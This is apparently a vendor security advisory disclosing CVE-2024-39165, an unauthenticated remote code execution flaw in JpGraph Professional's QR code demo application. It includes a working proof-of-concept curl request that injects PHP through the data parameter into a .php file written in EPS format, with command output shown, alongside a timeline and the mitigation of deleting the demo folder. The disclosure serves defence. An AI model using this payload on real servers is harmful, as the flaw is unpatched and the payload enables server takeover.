JpGraph Professional Version - Pre-Authenticated Remote Code Execution

25/06/2024 - Download

Product

JpGraph Professional Version

Severity

Critical

Fixed Version(s)

N/A

Affected Version(s)

≤ 4.2.6-pro

CVE Number

CVE-2024-39165

Authors

Alexandre Droullé

Description

Presentation

JpGraph is an Object-Oriented Graph creating library for PHP. The library is ready to be used by any PHP scripts (both CGI/APXS/CLI versions of PHP are supported). It offers different functionalities such as 3D effects, pie charts, geo maps, stock graphics and others.

 

Issue(s)

An unauthenticated demo application included in the professional version of JpGraph can be abused to write arbitrary data to files with arbitrary extensions, leading to remote code execution.

Timeline

Date Description
2024.02.27 Advisory sent to JpGraph
2024.03.13 JpGraph has been contacted a second time
2024.05.30 JpGraph has been contacted a third time
2024.06.25 Public release

 

Technical details

Description

The JpGraph Professional Version library includes a QR Code feature with an associated demo application in the /jpgraph/QR/demoapp folder.

Jpgraph demo application of the QR Code functionnality

The Data input field is used to define the value to store inside the QRCode. Options such as Save to let users define the name and the extension of the output file after the QRcode is generated. In the demo application context, files are stored under the demoapp folder.

However, different Image formats are available such as PNG, JPEG, GIF, WBMP, Postscript, EPS and ASCII. Only the EPS format used for Adobe products, keeps the data stored in the Data field after the creation process.

Arbitrary command execution inside the demo application

Therefore, using the EPS image format and an output file with a .php extension leads to arbitrary code execution. It can be triggered by accessing the generated file under the demoapp folder, e.g /jpgraph/QR/demoapp/synacktiv.php.

Arbitrary command execution 2

Command execution can be achieved using the following request:

$ curl -X GET 'http://target.local/jpgraph-4.2.6-pro/QR/demoapp/qr_image.php?data=<?=`id`?>&encoding=-1&modwith=1&version=-1&errcorr=-1&imgformat=eps&filename=synacktiv.php&submit=Create'

The code to be executed is defined inside the data= parameter. It will be injected in the file specified inside the parameter filename=. Because the output file has a PHP extension, when accessing it, the code will be triggered. In this example, the command id defined between PHP tags <=`id`?> will be written into synacktiv.php file.

The JpGraph folder may change in your environment.

To retrieve the result of the command execution, a file is created under the /demoapp/ folder with the name define in filename= :

$ curl 'http://target.local/jpgraph-4.2.6-pro/QR/demoapp/synacktiv.php'
%!PS-Adobe EPSF-3.0
%%Title: QR Barcode 1-M, mask=2
%%Creator: JpGraph Barcode http://jpgraph.net/
%%CreationDate: Thu 30 May 09:25:57 2024
%%BoundingBox: 0 0 58 58
%%EndComments
%%BeginProlog
%%EndProlog

%Module width: 2 pt

%Data: uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
%Each line represents one row and the x-position for black modules: [xpos]

2.05 setlinewidth

 

Impact

This vulnerability allows an unauthenticated attacker to execute arbitrary code on the underlying server, because the file extension is not filtered, and the data field is not properly sanitized.

Recommendation

There is no official patch at the moment. If you are impacted, it is recommended to delete all the /demoapp/ folder in the JpGraph tree. This part of the product is not needed for it to work properly and is only provided for testing purposes.